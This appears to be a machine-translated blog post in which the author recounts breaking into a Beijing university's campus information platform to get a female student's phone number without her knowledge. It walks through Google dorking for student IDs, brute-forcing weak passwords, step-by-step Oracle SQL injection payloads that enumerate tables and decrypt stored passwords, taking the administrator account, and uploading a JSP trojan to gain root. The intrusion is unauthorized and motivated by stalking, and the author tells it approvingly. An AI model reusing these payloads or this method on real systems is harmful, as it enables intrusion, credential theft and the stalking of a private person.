Oracle injection penetrated the campus information platform of a university in Beijing

I accidentally met a girl on the Internet. Because of her love and purity, she felt a heart-warming sensation.

I thought that when I got to my current age, I would not be tempted by another girl,

However, if you do not meet your feelings, you may never know what your feelings will look like.

I'm a little confused. Let's start with the question.

1. Purpose

This penetration test mainly aims to get the mobile phone number of the school girl.

Someone may ask: Can you just ask her if she doesn't have a mobile phone number? Why do I have to make so much effort to get it by myself?

This is based on an understanding that humans do not know how to cherish things that are too easy to get.

I chose to use a technical method to get the mobile phone number, so that the process of knowing her can become longer and more difficult.

2. Objectives

Because she knows her name and school,

FirstName + School websiteAs a keyword, search for her personal information on Google:

Note the syntax. The name must be enclosed by double quotation marks, indicating that the string does not need to be analyzed or interpreted and must be 100% matched.

Site: XXXX.edu.cn is the website of her school. Do not add www here, indicating to retrieve all sub-domain names.

I found her student ID through Google.

In addition, I also got an additional message, because she was too thin because she failed to pass the entrance examination!

At that time, she felt a little distressed and wanted to ask her to eat more food to protect her health. (Note: This is a standard dash performance ......)

Once you get the student ID, you can do more things in the future.

Based on my past experience, I began to look for a system similar to the educational administration platform, because on such a server, most of them stored the basic information of the students.

Finally, I found the school's Campus Information Platform:

3. Enter the Campus Information Platform

How to enter the campus platform has become the first threshold.

I already have her student ID, but there is a verification code here. If you directly crack the target school girl Zhang SWEET,

It will be very difficult. You need to write your own verification code recognition module, which is inefficient and has a low brute-force cracking success rate.

My idea is to first find a classmate's account and go to the campus information platform to see what information is in it and then proceed with the next step.

Search by using the following keywords in Google:School website + award + student ID

In this way, I can find the student IDs of hundreds of students.

In the preceding syntax, site is used to specify the school website, and filetype is used to specify the document format as Excel document,

Teachers like to organize the Award List into an Excel worksheet, which will reveal basic information like student ID and birthday.

After obtaining these student numbers, I wrote a small brute-force cracking program,

It automatically loads a batch of student IDs and uses weak passwords to log on. I only need to manually enter the verification code.

After trying about 30 students (10 minutes), I finally found a 12345678 password!

Then, I used my account to access the campus information platform,

I also know clearly that the campus information platform has relatively complete personal information and has the phone number I want!

I have locked the target to the campus information platform.

4. Find the Oracle injection point

After entering the campus information platform, I began to look for common vulnerabilities. On a page showing news, I found a digital Oracle injection vulnerability!

Add single quotation marks after a URL with numeric parameters'The classic error message is displayed!

The error message indicates that the single quotes are not properly closed! According to the error message, we can see that the other party uses Oracle as the database server (ORA-01756 ).

Add after URL"And 1 = 1", The page is displayed normally,

Change"And 1 = 2", An error occurs on the page, prompting NULL. Make sure there is a digital injection:

Injection with clear error prompts is much easier,

Next, I ran this injection point into the tool Pangolin and got the following data:

1. Hash of several Oracle users

2. the IP address of the database server is 192.168.X.X blocked in the LAN.

3. I guessed all the data tables of the current user. However, I am very sorry that I did not store data tables with sensitive information (such as accounts!

Put the Hashes of these database users into Cain and use several dictionary files for brute-force cracking. Several successful attempts have been made!

This shows that the Administrator's security awareness is true... Very low!

After cracking several Oracle accounts, I began to think about how to query the tables of these users!

Key information such as "Account" may be stored in the tables they own!

However, I cannot directly access the database server because it is located in the LAN.

I started to try to use cross-database queries like ms SQL.

Can Oracle query data across databases? You can search the relevant information on the Internet and find it is possible, but you need to use db_link to create a link first,

With the user's password, you can establish a link, but you do not know how to implement multi-line execution in Oracle,

Creating a db link becomes a problem, and the idea is interrupted...

Because I know little about Oracle, I temporarily gave up this injection point.

5. Find the key breakthrough

Giving up an injection point makes me feel a little unwilling. In some extreme environments, it may become the only weakness I can find...

Giving up means giving up.

But fortunately, this is not the ultimate environment. Later, I began to look for breakthroughs elsewhere,

I quoted a very pretentious phrase called "Kung Fu pays off", and I found another injection point!

This time, it is a volume-type injection.

Add single quotation marks after the URL', Prompting the database reading error;

AddAnd '1' = '1The page is displayed normally;

AddAnd '1' = '2, The page is still normal;

This indicates that the injection vulnerability exists, but the query results do not directly affect the page display.

Generally, take the injection point to the tool and run it for a while.

However, unfortunately, this page can be accessed only after login. Most injection tools do not provide a browser that allows us to log on first before injection.

So I chose a hard manual injection.

At the beginning, I guess the number of columns. Add the following content after the URL:

'Order by 10 --An error is reported, indicating that the number of columns is less than 10

Order by is used to specify the sorting method,

Order by 10 means sorting by 10th columns;

An error is reported, indicating that the data table does not have 10th columns. In other words, the number of columns smaller than 10 is

'Order by 5 -- after half-fold, continue to report an error

'Order by 3 -- normal display

'Order by 4 -- normal display

We can conclude that the number of columns is 4. Try union query:

'And 1 = 2 union select NULL, NULL from dual --

The page is normal, and it is determined that it is 4 columns.

'And 1 = 2The function is to leave the result of the previous subquery blank,

In this way, we can retrieve the content we want in the second select subquery and put it into the final query result so that the web server can return it.

Continue to change the injection statement:

'And 1 = 2 union select '123', '123', '123', '123' from dual --

The page is displayed normally. Make sure all columns are of the varchar type,

In addition, the flag string 111 is displayed on the page.

In this way, we can easily construct and query what we want!

You can change '123' to the desired subquery:

Get the current Oracle user:

'And 1 = 2 union select SYS_CONTEXT ('userenv', 'current _ user'), '20170101', '20160301' from dual --

The result is good news! The user name for the last Digital Injection point is different.

This is a more concealed injection point. Intuition tells me that there may be sensitive information!

Then, you can guess the list name and column name by querying the system table user_tables and user_tab_columns.

Query the data table with the PASSWORD keyword in the column Name:

'And 1 = 2 union select (select table_name from user_tab_columns where column_name like '% PASSWORD %' and rownum = 1), '2016', '20160301', '20160301' from dual --

The user_tab_columns table stores the columns in each table.

Note that because both table_name and columun_name are stored in the Table in uppercase, you must use an uppercase PASSWORD (case sensitive ).

Rownum = 1 is followed by extracting only the first result. It is required for oracle. Do not ignore this detail.

The content displayed on the page is a data table with a PASSWORD in the column name.

Only the first data table containing the PASSWORD keyword is shown above. How can I query other tables?

First, you can use the non-equal sign <> exclusion method. For example, here, the name of the first table isDRM_SYS_DATASOURCE

I only need to exclude DRM_SYS_DATASOURCE from the query. The SQL statement is constructed as follows:

'And 1 = 2 union select (select table_name from user_tab_columns where column_name like '% PASSWORD %' and table_name <> 'drm _ SYS_DATASOURCE 'and rownum = 1), '2016 ', '123', '123' from dual --

After one exclusion, we can guess all the tables. However, if there are too many excluded tables, it is very troublesome to add exclusion conditions every time.

Therefore, there is a second method: traverse multiple records using subqueries:

Construct the following SQL statement:

'And 1 = 2 union select (select tn from (select rownum r, table_name tn from user_tab_columns where column_name like '% PASSWORD %') tb where r = 1), '123 ', '123', '123' from dual --

In the inner square brackets, I created a subquery to retrieve the table with PASSWORD in all column names from user_tab_columns,

The rownum alias is r, the table_name alias is tn, and the temporary table name obtained from the query is tb. That is to say,

PassSelect rownum r, table_name tn from user_tab_columns where column_name like '% PASSWORD %', I got a table named tb whose content is similar to this:

R tn 1 admin 2 users 3...

 

Then, we retrieve the tn content from the subquery table in sequence. If r = is set to the value of the following number, the names of other tables can be retrieved,

This is a little troublesome.

What makes me speechless is that I still cannot find a place to store user information by searching for the PASSWORD...

However, I did not give up. I continued to find the table containing the PSW keyword in the field and finally found the XXX_PERSON table that stores user information!

When you guess the names of all columns, You need to construct the following injection statement:

'And 1 = 2 union select (select cn from (select rownum r, column_name cn from user_tab_columns where table_name = 'xxx _ person') tb where r = 1), '123 ', '123', '123' from dual --

By means of a single guess, we can get a rough idea of the table structure. PSN_ACCOUNT is used to store the user name, And PSN_PSW is used to store the password.

Because I know the student ID of xuemei, I will look for her password and construct an SQL statement:

'And 1 = 2 union select PSN_PWD, '2', '3', NULL from XXXX_PERSON where PSN_ACCOUNT = '11xx '--

Haha, the password finally appeared... However, it is not slow:

It cannot be relaxed ~~ Password... It has been encrypted...

The other party does not adopt general encryption methods, such as MD5.

But I have to stick to it for a while...

Therefore, with a glimmer of hope, I traversed all the functions of the current user and constructed the SQL statement:

'And 1 = 2 union select (select object_name from user_objects where object_type = 'function' and rownum = 1), '2', '3', NULL from dual --

The first function isXXXXXX_DECODE! I was so excited that the dead horse was used as a medical doctor to test the function to decrypt the password of the school girl:

'And 1 = 2 union select xxxx_decode (PSN_PWD), '2', '3', NULL from XXXX_PERSON where PSN_ACCOUNT = '11xx '--

At this point, I finally saw the plain text password of my school girl.

By guessing a function name and using this function to successfully decrypt the PASSWORD, the luck component is already very high!

I used my student ID and password to log on to the Campus Information Platform and finally saw her cute photo:

So far. My goal has been reached, and I got her mobile phone number. :)

However, as penetration has reached this stage, it is a pity that we will not continue to do the final work.

I continue to guess the Administrator's password. The structure is as follows:

'And 1 = 2 union select xxxx_decode (PSN_PWD), '2', '3', NULL from ORG_PERSON where PSN_ACCOUNT = 'root '--

Error. It indicates that the user root does not exist and is replaced with admin,

'And 1 = 2 union select xxxx_decode (PSN_PWD), '2', '3', NULL from XXXX_PERSON where PSN_ACCOUNT = 'admin '--

Finally, the plaintext password is displayed.

Log on to the system with the Administrator account, and find the upload page at the place where the information is published:

Try to upload a JSP Trojan. A message box is displayed, prompting that the file type is invalid.

However, this judgment was done locally using javascript. I used the IE spoof compiled by ah d to modify the content on the browser page, and changed the button to submit,

The JSP Trojan is successfully uploaded. After entering, we found that the web service was run as root! I'm root then.

6. Postscript

The process of getting the student's sister Zhang SWEET mobile phone number is very difficult. But it also brings me a lot of happiness.

For some reason, I didn't send her a short message or call her.

Maybe, I will put this beauty in my heart.

We were originally from two worlds. I was in Xi'an, while she was in Beijing.

She should be abroad after graduation, and I will probably be a migrant worker in an IT company later.

Therefore, the path of our fate is actually farther and farther away.

Sagenana, Zhang SWEET!